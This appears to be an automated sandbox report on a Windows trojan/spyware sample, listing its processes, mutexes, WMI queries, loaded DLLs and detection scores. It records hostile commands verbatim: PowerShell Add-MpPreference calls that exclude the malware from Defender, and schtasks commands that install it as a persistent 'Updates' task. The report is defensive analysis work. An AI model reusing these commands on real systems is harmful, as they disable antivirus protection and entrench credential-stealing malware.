Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: _0020.SetAccessControl
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: _0020.AddAccessRule
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: _0020.SetAccessControl
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/103@1/1

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

File created: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Mutant created: \Sessions\1\BaseNamedObjects\eoQOydmdtHej
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

File created: C:\Users\user\AppData\Local\Temp\tmpC18A.tmp

Jump to behavior

Source: nzLoHpgAln.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: nzLoHpgAln.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmp446E.tmp.14.dr, tmp4490.tmp.14.dr, tmpAAF.tmp.14.dr, tmp446F.tmp.14.dr, tmpE705.tmp.8.dr, tmp447F.tmp.14.dr, tmpE728.tmp.8.dr, tmpE6F4.tmp.8.dr, tmpE717.tmp.8.dr, tmpE716.tmp.8.dr, tmpA9F.tmp.14.dr, tmpE704.tmp.8.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: nzLoHpgAln.exe	ReversingLabs: Detection: 63%
Source: nzLoHpgAln.exe	Virustotal: Detection: 56%

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

File read: C:\Users\user\Desktop\nzLoHpgAln.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\nzLoHpgAln.exe "C:\Users\user\Desktop\nzLoHpgAln.exe"
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Users\user\Desktop\nzLoHpgAln.exe "C:\Users\user\Desktop\nzLoHpgAln.exe"
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process created: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe"	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Users\user\Desktop\nzLoHpgAln.exe "C:\Users\user\Desktop\nzLoHpgAln.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp"
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process created: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: appresolver.dll
